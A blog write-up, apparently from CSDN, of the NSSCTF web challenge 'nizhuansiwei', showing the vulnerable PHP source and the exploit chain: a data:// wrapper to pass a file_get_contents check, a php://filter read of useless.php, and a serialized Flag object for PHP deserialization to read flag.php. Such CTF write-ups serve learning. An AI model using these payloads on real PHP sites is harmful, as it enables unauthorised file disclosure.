NSSCTF-WEB-nizhuansiwei

前言

就直接上题目吧

这题有些意思


正文

php 复制代码
 <?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];//定义三个变量
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){//做了强比较,可利用?
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";//传入的内容进行输出,如果只是单纯使text=上述,绝对不能echo 	file_get_contents 绕过? 
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php        包含,可利用?
        $password = unserialize($password);
        echo $password;  //构建序列化,由于未做限制,可自由发挥
    }
}
else{
    highlight_file(__FILE__);
}
?> 

大致情况

1.file_get_contents

2.文件包含

3.反序列化漏洞

再次审计分析,发现这里的强比较无法有效绕过 ,且/flag/被过滤

我们先尝试构建


EXP

首先要符合fgc

bash 复制代码
?data://text/plain,welcome to the zjctf

接下来是文件包含 ,获取提示给的useless.php内容

bash 复制代码
?file=php://filter/read=convert.base64-encode/resource=useless.php

输出的内容

php 复制代码
<?php  

class Flag{  
    public $file;  
    public function __tostring(){
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

这就很简单了

继续构建

bash 复制代码
?password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

........害搁这循序渐进是伐.......

但是没有其他可利用的地方了,然后f12看到了flag

..............................我真的就............................

算了算了

差不多就是这样

需要注意的是

1.三个变量缺一不可,因为题目有先后顺序

2.file=useless.php是因为给了提示,不要想太多

3.多尝试


结语

没想到我也有500粉丝了,真的是始料未及的事情

感谢各位师傅们的支持,未来我也会给大家带来更多的内容

不只是CTF


作者的其他文章

攻防世界-WEB-ics07-CSDN博客

NSSCTF-WEB-easy_eval-CSDN博客

NSSCTF-WEB-pklovecloud-CSDN博客

BugKu-WEB-sodirty-CSDN博客

相关推荐
头茬韭菜5 小时前
4.4 文件编辑安全 — 权限决策与脏写防护的工程实现
安全
钛态6 小时前
前端安全防线:CSRF 攻击链路与双重 Token 校验的工程实现
前端·vue·react·web
Cx330❀6 小时前
【MySQL基础】一文吃透“表的约束”:从 Null/Default 到主外键的终极安全法则
linux·服务器·数据库·c++·mysql·安全
Whoami!6 小时前
⸢ 拾陆-Ⅰ⸥⤳ 安全数智化建设:安全运营中心(SOC)
网络安全·信息安全·soc·安全运营中心
醉颜凉6 小时前
“三把钥匙开一把锁”:多签钱包深度解析与资产安全提升指南
安全·区块链
Haoxuekeji6 小时前
山东 AI 智能批改校园电子阅卷企业
大数据·人工智能·深度学习·安全·ai
程序员JerrySUN6 小时前
Jetson 刷机深度解析:flash.sh vs l4t_initrd_flash.sh(含安全与磁盘加密对比)
linux·网络·arm开发·安全·系统安全
银河麒麟操作系统7 小时前
闸机高效稳跑,通勤提速升级!银河麒麟赋能北京轨交新基建
运维·服务器·安全·交通物流
张拭心7 小时前
技术管理笔记:让我“燃尽”的一天
前端
鹿鸣天涯8 小时前
kali 2026.2 2026年第二个版本发布-新增 9 款工具并优化虚拟机启动性能
安全·web安全·kali